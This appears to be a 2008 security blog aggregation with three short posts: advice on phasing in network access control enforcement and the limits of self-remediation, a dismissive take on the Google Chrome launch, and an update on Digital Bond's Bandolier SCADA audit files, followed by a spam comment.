The old adage that you are only as strong as your weakest link is a fundamental truth in security.  According to Tim Greene, the weakest link in the chain of protection that NAC can provide is too often the human being behind the computer. Tim relays in his most recent NAC newsletter the experience of a college IT administrator who when they turned NAC on flooded his help desk with calls from students who could not remediate their own computers.  This is a real problem.  Tim points out that this is a good reason why you should not turn on enforcement right away.  This gives you a chance to profile the devices on your networks and work on getting them to look like what you want before you enforce.  This is right in line with a "phased approach to NAC", a white paper we have done at StillSecure. 

It also points out another issue I have written about before.  Too many NAC vendors have "self-remediation" as their solution for getting computers up to speed.  Fact is for non-IT personnel, self0remediation is just not a viable option.  Your NAC product needs to have other options around patching and remediating devices.

Also, I just don't understand colleges that are content to test a device once a semester.  Tim's article mentions this too.  Once you have gone through the trouble of setting NAC up, it doesn't cost you anything more to test these devices every time they come on the network. Defeats the whole purpose if you ask me.

Sucking the chrome off a bumper [StillSecure, After All These Years]

Posted: 03 Sep 2008 07:41 AM CDT

There you have it, my entry into the chrome blogosphere sweepstakes.  In my years of blogging and more years of reading blogs, I have never seen such coverage of a new product launch or any other topic for that matter.  Maybe I should start a Chrome Bloggers Network?  Did Google pay bloggers to write about it?  Did I miss the memo about the prize for the best blog post on Chrome?

Personally, the geek in me had me download it. I played with it, looked at a bunch of sites and than put it in the same place I keep Safari. No icon anywhere on the desktop and who knows if I will open it again over the next year. I like Firefox.  I hope the Google marketing machine will not hurt the Mozilla team.

Bandolier Update: New Applications on the List [Digital Bond]

Posted: 03 Sep 2008 07:25 AM CDT

Big news for Bandolier… last week at the PCSF Annual Meeting (now called the Process Control Systems Industry Conference), we presented on the project and unveiled an updated list of audit files. Newcomers include the AREVA eTerra and Emerson Ovation applications among others. Check out the complete list in the presentation or over at the List of Bandolier Audit Files SCADApedia article.

We are excited about the crossection and industry saturation represented in the Bandolier project. Don’t forget, some of the audit file are available now in alpha versions. Stay tuned for a beta release of those and several more from the list. As always, we welcome your feedback and look forward to getting more of these audit files into the hands of asset owners and operators.

1 comment:

Rizash said...

Wow, you have a great blog. Very informative too. I’ll be visiting next time…


Blackened Fish Recipe